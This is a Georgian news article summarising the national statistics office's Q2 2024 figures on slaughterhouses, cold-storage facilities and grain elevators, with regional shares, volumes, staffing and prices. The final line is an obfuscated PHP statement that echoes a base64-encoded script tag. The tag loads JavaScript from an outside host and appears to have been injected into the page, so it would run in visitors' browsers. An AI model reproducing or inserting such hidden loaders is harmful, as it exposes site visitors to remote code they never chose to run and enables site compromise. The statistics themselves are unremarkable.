celsiusi
ავერსი შნაიდერი

 სტატისტიკის ეროვნული სამსახური 2024 წლის II კვარტალში სასაკლაოების, ელევატორებისა და სამაცივრე მეურნეობების გამოკვლევის ძირითად შედეგებს აქვეყნებს.

"საქსტატის" ცნობით, 2024 წლის II კვარტალში საქართველოში 114 ერთეული ცხოველთა და ფრინველთა სასაკლაო ფუნქციონირებდა, მათგან 18.4 პროცენტი მდებარეობს კახეთის რეგიონში, 15.8 პროცენტი - იმერეთის რეგიონში, 14.9 პროცენტი ქვემო ქართლის რეგიონში, 14.9 პროცენტი - შიდა ქართლის რეგიონში, 9.6 პროცენტი - სამეგრელო-ზემო სვანეთის რეგიონში, 9.6 პროცენტი მცხეთა-მთიანეთის რეგიონში, ხოლო 16.7 პროცენტი - სხვა რეგიონებშია განთავსებული.

„გამოკვლევის შედეგების მიხედვით, 2024 წლის II კვარტალში სასაკლაოებში დაიკლა 115.0 ათასი სული პირუტყვი, საიდანაც 34.6 პროცენტი - მსხვილფეხა რქოსანი პირუტყვი, 56.7 პროცენტი - ღორი, ხოლო 6.8 პროცენტი ცხვარი და თხა იყო. დანარჩენი პირუტყვის წილი (არ მოიცავს ფრინველს) 1.9 პროცენტს შეადგენს. გარდა ამისა, საანგარიშო პერიოდის განმავლობაში სასაკლაოებში დაკლული ფრინველის რაოდენობა 3 038.4 ათასი ერთეულით განისაზღვრა.

სასაკლაოების მიერ 2024 წლის II კვარტალში 14.3 ათასი ტონა ხორცი იქნა წარმოებული (იგულისხმება დაკლული წონა, ფრინველის ხორცის ჩათვლით), საიდანაც 31.8 პროცენტი მოდის მსხვილფეხა რქოსანი პირუტყვის ხორცზე, 34.8 პროცენტი - ფრინველის ხორცზე, 32.3 პროცენტი - ღორის ხორცზე, 1.1 პროცენტი - ცხვრისა და თხის ხორცზე, ხოლო დანარჩენს უმნიშვნელო წილი უკავია.

საანგარიშო პერიოდში მომსახურება გაეწია 8.4 ათას პირს, საიდანაც 47.1 პროცენტი შინამეურნეობების (ოჯახური მეურნეობები) სახით იყვნენ წარმოდგენილნი. სასაკლაოებში დასაქმებულთა საშუალო თვიურმა რაოდენობამ 1 040 კაცი შეადგინა.

ერთეული პირუტყვის დაკვლაზე მომსახურების საშუალო ფასი შეადგენს: მსხვილფეხა რქოსანი პირუტყვის დაკვლის საფასური - 36.6 ლარი, ღორის დაკვლის საფასური - 31.7 ლარი, ხოლო ცხვრის ან თხის დაკვლის საფასური - 15.3 ლარი“,-აღნიშნულია "საქსტატის" მიერ გავრცელებულ ინფორმაციაში.

ამასთან, სტატისტიკის ეროვნული სამსახურის მონაცემებით, 2024 წლის II კვარტალში საქართველოში 218 ერთეული სამაცივრე მეურნეობა ფუნქციონირებდა, რომელთა უმრავლესობაც (43.6 პროცენტი) შიდა ქართლის რეგიონშია განთავსებული.

„მოქმედი სამაცივრე მეურნეობები ასევე განთავსებულია თბილისში (16.1 პროცენტი), კახეთის რეგიონში (12.4 პროცენტი), სამეგრელო-ზემო სვანეთის რეგიონში (8.3 პროცენტი), იმერეთის რეგიონში (6.0 პროცენტი), ქვემო ქართლის რეგიონში (5.5 პროცენტი), აჭარის ა.რ.-ში (4.1 პროცენტი), მცხეთა-მთიანეთის რეგიონში (1.4 პროცენტი), გურიის რეგიონში (1.4 პროცენტი), სამცხე-ჯავახეთის რეგიონში (0.9 პროცენტი) და რაჭა-ლეჩხუმისა და ქვემო სვანეთის რეგიონში (0.5 პროცენტი):

2024 წლის II კვარტალში მომსახურება გაეწია 387 მომხმარებელს. მწარმოებელთა და გადამყიდველთა რაოდენობამ, რომელთაგანაც შესყიდულ იქნა პროდუქცია შემდგომი რეალიზაციის მიზნით - 832 ერთეული შეადგინა, ხოლო სამაცივრეებში დასაქმებულთა საშუალო თვიური რაოდენობა 1 372 კაცით განისაზღვრა.

2024 წლის II კვარტლის განმავლობაში სამაცივრეებში შენახული (განთავსებული) იყო 92.8 ათასი ტონა პროდუქცია, მათ შორის 42.1 პროცენტი - ქათმის ხორცი (გაყინულის ჩათვლით), 9.2 პროცენტი - ხილი და ბოსტნეული, 20.0 პროცენტი - ხორცი და ხორცპროდუქტები (ნახევარფაბრიკატების ჩათვლით, ქათმის ხორცის გარდა), 13.0 პროცენტი - თევზეული, 10.6 პროცენტი - რძის პროდუქტები და 5.1 პროცენტი სხვა პროდუქტები.

2024 წლის II კვარტალში სამაცივრე მეურნეობებში შენახული პროდუქციის მთლიანი მოცულობიდან 14.9 პროცენტს - საკუთარი წარმოების, 17.8 პროცენტს - შემდგომი რეალიზაციის მიზნით შესყიდული, ხოლო 67.3 პროცენტს მომსახურების სახით შენახული პროდუქცია შეადგენდა. ამავე პერიოდში, მომსახურების სახით მიღებულმა შემოსავალმა 7.8 მლნ. ლარი შეადგინა.

2024 წლის II კვარტალში სამაცივრე მეურნეობების მიერ გაყიდულია 134.4 მლნ. ლარის ღირებულების (22.6 ათასი ტონა) პროდუქცია, საიდანაც, ღირებულებით გამოსახულებაში, იმპორტირებულმა პროდუქციამ შეადგინა 24.4 პროცენტი, საკუთარი წარმოების პროდუქციამ - 24.8 პროცენტი, ხოლო გაყიდვის მიზნით შესყიდულმა (ადგილობრივი) პროდუქციამ - 50.8 პროცენტი. ამასთან, საანგარიშო პერიოდში, სამაცივრეების მიერ გაყიდული საკუთარი წარმოების პროდუქციის მთლიანი მოცულობის 45.1 პროცენტი მოდიოდა ქათმის ხორცზე. ამავე პერიოდში, სამაცივრე მეურნეობების მიერ გაყიდული იმპორტირებული პროდუქციის მთლიან ღირებულებაში მნიშვნელოვანი წილი ქათმის ხორცზე (გაყინულის ჩათვლით) (35.4 პროცენტი), პირუტყვის ხორცსა და ხორცპროდუქტებზე (ნახევარფაბრიკატების ჩათვლით) (33.0 პროცენტი) და თევზეულზე (10.8 პროცენტი) მოდის.

საანგარიშო პერიოდში, სამაცივრე მეურნეობების მიერ უცხო ქვეყნებში გაყიდული პროდუქციის ღირებულებამ 6.8 მლნ. ლარი შეადგინა, რაც ამავე პერიოდში გაყიდული პროდუქციის მთლიანი ღირებულების 5.0 პროცენტს შეადგენს. საზღვარგარეთ ძირითადად რეალიზებულია ქათმის ხორცი, თევზეული, ხილი და ბოსტნეული.

გამოკვლევის შედეგების მიხედვით, კამერების საშუალო დღიური დატვირთვა (პროცენტულად კამერების ჯამური ტევადობიდან) აპრილში შეადგენდა 49.0 პროცენტს, მაისში - 56.5 პროცენტს, ხოლო ივნისში - 47.1 პროცენტს.

2024 წლის II კვარტალში საქართველოში 29 ელევატორი ფუნქციონირებდა, რომელთა უმრავლესობაც ქვემო ქართლის (31.0 პროცენტი) და სამეგრელო-ზემო სვანეთის (17.2 პროცენტი) რეგიონებში იყო განთავსებული. ელევატორების 13.8 პროცენტი ფუნქციონირებს იმერეთის რეგიონში, 10.3 პროცენტი კახეთში, 10.3 პროცენტი - ქ. თბილისში, 10.3 პროცენტი - შიდა ქართლის რეგიონში, 6.9 პროცენტი კი - გურიის რეგიონში:

2024 წლის II კვარტლის განმავლობაში მომსახურება გაეწია 13 მომხმარებელს. მწარმოებელთა და გადამყიდველთა რაოდენობამ, რომელთაგანაც შესყიდულ იქნა პროდუქცია შემდგომი რეალიზაციის მიზნით, 41 ერთეული შეადგინა, ხოლო ელევატორებში დასაქმებულთა საშუალო თვიური რაოდენობა 379 კაცით განისაზღვრა.

2024 წლის II კვარტალში, ელევატორებში შენახული (განთავსებული) იყო 95.0 ათასი ტონა პროდუქცია, რომლის 34.3 პროცენტს წარმოადგენდა ხორბალი. საანგარიშო პერიოდში, ელევატორებში განთავსებული პროდუქციის მთლიანი მოცულობის 64.3 პროცენტს ელევატორების მიერ შემდგომი რეალიზაციის მიზნით შესყიდული პროდუქცია შეადგენდა.

2024 წლის II კვარტალში, ელევატორების მიერ გაყიდულია 80.7 მლნ. ლარის ღირებულების 64.8 ათასი ტონა პროდუქცია, საიდანაც 63.1 პროცენტი იყო იმპორტირებული პროდუქცია.

ელევატორების მიერ საკუთარი წარმოების პროდუქციაში, როგორც მოცულობის, ისე ღირებულების მიხედვით, ჭარბობდა ხორბლის ფქვილი, რომელზეც მოდიოდა ელევატორების მიერ გაყიდული საკუთარი წარმოების პროდუქციის 86.5 პროცენტი.

გამოკვლევის შედეგების მიხედვით, ელევატორების საცავების საშუალო დღიური დატვირთვა (პროცენტულად საცავების ჯამური ტევადობიდან) აპრილში შეადგენდა 48.0 პროცენტს, მაისში - 47.0 პროცენტს, ხოლო ივნისში - 47.9 პროცენტს“,-აღნიშნულია საქსტატის მიერ გავრცელებულ ინფორმაციაში.

124
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");